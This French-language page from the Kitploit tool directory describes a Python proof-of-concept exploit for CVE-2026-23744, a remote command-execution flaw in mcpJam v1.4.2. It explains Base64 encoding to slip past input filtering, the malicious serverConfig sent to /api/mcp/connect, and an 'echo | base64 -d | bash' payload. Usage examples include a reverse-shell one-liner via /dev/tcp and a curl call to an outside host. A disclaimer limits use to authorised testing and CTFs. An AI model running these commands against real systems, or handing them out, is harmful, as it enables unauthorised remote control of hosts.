Skip to content
KitploitKITPLOIT
OutilsBlog
Soumettre
OutilsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
CVE-2026-23744-poc — cve-2026-23744 python exploit | Kitploit
Outils/GitHubGitHub/keeieb79/cve-2026-23744-poc
Génération de PayloadsAnalyse des VulnérabilitésExploitationExploitation d'Applications WebTests d'IntrusionApprentissage et Éducation
GitHubkeeieb79/cve-2026-23744-poc

CVE-2026-23744-poc

cve-2026-23744 python exploit

Voir le dépôt
2il y a 3 moisPas encore vérifié

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →
Partager

CVE-2026-23744 — Exploit d'exécution de code à distance (RCE) pour mcpJam

Un exploit de preuve de concept en Python 3 pour CVE-2026-23744, une vulnérabilité d'exécution arbitraire de commandes affectant mcpJam v1.4.2.

Cet utilitaire automatise la livraison du payload en encodant les commandes en Base64 de manière transparente avant leur transmission, ce qui aide à contourner les mécanismes restrictifs de validation des entrées et de filtrage des caractères. Le payload est décodé et exécuté via un wrapper /bin/bash sur le système cible.


Fonctionnalités

Encodage automatique du payload en Base64

Les commandes sont automatiquement encodées avant la transmission, ce qui améliore la fiabilité lorsqu'on cible des applications appliquant une validation stricte des entrées ou des restrictions de caractères.

Exécution flexible de commandes

Prend en charge l'exécution arbitraire de commandes, notamment :

  • Shells inversés (sh, bash, nc, etc.)
Télécharger l’outil
  • Énumération du système
  • Test de connectivité réseau
  • Livraison de payloads personnalisés
  • Sortie de débogage détaillée

    Affiche :

    • Les payloads de requêtes JSON générés
    • Les réponses brutes du serveur

    Cela simplifie le dépannage et la validation de l'exploit.

    Contournement de la vérification SSL

    Supprime les avertissements de vérification de certificat, permettant d'interagir avec des cibles qui utilisent des certificats SSL auto-signés ou non fiables.


    Utilisation

    Prérequis

    Installez la dépendance requise :

    root@kitploit:~
    pip install requests
    

    Syntaxe

    root@kitploit:~
    python3 exploit.py <target_url> "<command>"
    

    Exemples

    Test de connectivité

    root@kitploit:~
    python3 exploit.py http://devhub.com:6274 "curl http://10.10.14.70:8888"
    

    Shell inversé

    root@kitploit:~
    python3 exploit.py http://devhub.com:6274 "sh -i >& /dev/tcp/10.10.14.70/4444 0>&1"
    

    Détails techniques

    L'exploit cible le point de terminaison /api/mcp/connect en créant un objet serverConfig malveillant.

    Au lieu de transmettre les commandes directement, le payload est transformé en chaîne encodée en Base64 et exécuté via Bash :

    root@kitploit:~
    "args": [
        "-c",
        f"echo {base64_payload} | base64 -d | bash"
    ]
    

    Cette approche permet d'échapper au filtrage au niveau de l'application tout en garantissant que le payload est décodé et exécuté entièrement sur l'hôte cible.

    Flux d'exécution

    1. La commande fournie par l'utilisateur est encodée en Base64.
    2. Le payload encodé est intégré dans la requête serverConfig.
    3. Le serveur cible décode le payload à l'aide de base64 -d.
    4. La commande décodée est dirigée directement vers /bin/bash.
    5. La commande s'exécute avec les privilèges du processus mcpJam vulnérable.

    Avertissement

    [!WARNING] Ce projet est fourni uniquement à des fins éducatives, pour des évaluations de sécurité autorisées et pour les environnements Capture The Flag (CTF).

    Toute utilisation non autorisée contre des systèmes pour lesquels vous ne disposez pas d'une autorisation explicite est illégale et contraire à l'éthique. L'auteur décline toute responsabilité en cas d'utilisation abusive, de dommages ou de conséquences juridiques découlant de l'utilisation de ce logiciel.